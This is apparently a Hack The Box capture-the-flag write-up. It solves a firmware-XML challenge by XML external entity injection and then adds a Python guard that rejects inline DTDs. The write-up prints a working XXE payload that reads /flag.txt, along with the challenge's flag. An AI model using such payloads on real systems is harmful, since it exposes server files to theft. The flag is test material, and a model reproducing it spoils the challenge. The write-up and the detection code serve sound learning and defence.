Solving Jailbreak of HTB CTF
Problem - The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door's access port? The flag is located in /flag.txt
Our primary hints - ‘/flag.txt’ and ‘firmware’
So there is a tab named ‘ROM’ in the spawned Docker instance. In there is our target: an XML file.
A part of it looks something like this -
<Firmware>
<Version>1.33.7</Version>
<ReleaseDate>2077-10-21</ReleaseDate>
<Description>Update includes advanced biometric lock functionality for enhanced security.</Description>
</Firmware>
The vulnerability I identified first: whatever is written in the Version tag is reflected back in the output a line below, which means the application parses the XML we submit and echoes the parsed value.
The trick is to have the XML parser substitute the Version value for us by declaring an entity in an inline DTD.
Let me tell you what I mean:
<!DOCTYPE FirmwareUpdateConfig [
<!ENTITY example "Hello World">
]>
<Version>&example;</Version>
It will now reflect ‘Hello World’ instead of 1.33.7, because the parser expands the entity before the value is echoed.
This is our backdoor. In simple words: declare an external entity that points at the file ‘flag.txt’ and reference it inside Version. Like this:
<!DOCTYPE FirmwareUpdateConfig [
<!ENTITY myfile SYSTEM "file:///flag.txt">
]>
<Version>&myfile;</Version>
There you cracked it -
HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_b103d476e8c275bf4a21c7def89a2c69}
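From the defender's side, the fix for this class of bug is to refuse any document that carries an inline DTD before it reaches the parser, so an entity reference inside Version is never expanded. The following is an added example written for this write-up, not code from the challenge or from HTB; the firmware element names and the two payload shapes are taken from the snippets above, while the function names (`xxe_indicators`, `parse_firmware`, `unsafe_version`) and the sample documents are my own. It uses only the Python standard library; `unsafe_version` is included purely to show that the stock `xml.etree` parser does expand DTD-declared entities (the reflection the write-up relies on), which is why the DOCTYPE check must run first.

```python
"""Added example: reject inline DTDs before parsing firmware-config XML.

Not code from the challenge. Element names follow the write-up; the
function names and sample documents below are constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the write-up's firmware snippet.
BENIGN_XML = """<Firmware>
<Version>1.33.7</Version>
<ReleaseDate>2077-10-21</ReleaseDate>
<Description>Update includes advanced biometric lock functionality for enhanced security.</Description>
</Firmware>"""

# Internal entity: the parser substitutes the declared text into <Version>.
INTERNAL_ENTITY_XML = """<!DOCTYPE Firmware [
<!ENTITY example "Hello World">
]>
<Firmware><Version>&example;</Version></Firmware>"""

# External entity: the same mechanism pointed at a local file (the XXE shape
# from the write-up), used here only as input the guard must reject.
EXTERNAL_ENTITY_XML = """<!DOCTYPE Firmware [
<!ENTITY myfile SYSTEM "file:///flag.txt">
]>
<Firmware><Version>&myfile;</Version></Firmware>"""

# Any DOCTYPE at all is refused; that is the standard mitigation, since a
# firmware config has no legitimate need for a DTD.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
_ENTITY_RE = re.compile(r"<!ENTITY\s+\S+\s+(SYSTEM|PUBLIC)", re.IGNORECASE)


def xxe_indicators(xml_text: str) -> list:
    """Return the reasons a document should be refused (empty list = clean)."""
    reasons = []
    if _DOCTYPE_RE.search(xml_text):
        reasons.append("inline DTD (<!DOCTYPE) present")
    if _ENTITY_RE.search(xml_text):
        reasons.append("external entity declaration (SYSTEM/PUBLIC) present")
    return reasons


def parse_firmware(xml_text: str) -> dict:
    """Parse a firmware config into {tag: text}, but only if it has no DTD.

    Raises ValueError instead of parsing when a DOCTYPE is present, so an
    entity reference inside <Version> is never expanded.
    """
    reasons = xxe_indicators(xml_text)
    if reasons:
        raise ValueError("rejected firmware XML: " + "; ".join(reasons))
    root = ET.fromstring(xml_text)
    return {child.tag: (child.text or "") for child in root}


def unsafe_version(xml_text: str) -> str:
    """The 'before' picture: an unguarded parser expands DTD-declared entities.

    Only ever call this with the harmless internal-entity sample; it exists to
    show the reflection the write-up describes, not as something to deploy.
    """
    return ET.fromstring(xml_text).find("Version").text


if __name__ == "__main__":
    print(parse_firmware(BENIGN_XML))
    print("unguarded parser reflects:", unsafe_version(INTERNAL_ENTITY_XML))
    for sample in (INTERNAL_ENTITY_XML, EXTERNAL_ENTITY_XML):
        try:
            parse_firmware(sample)
        except ValueError as err:
            print(err)
```

In a real service the same policy is usually enforced by the parser itself (for Python, the `defusedxml` package wraps the stdlib parsers with DTD and entity expansion disabled); the pre-parse check above is the portable version of that policy and doubles as a log-worthy detection signal: a DOCTYPE arriving in a field that should only ever hold a version string is itself the indicator.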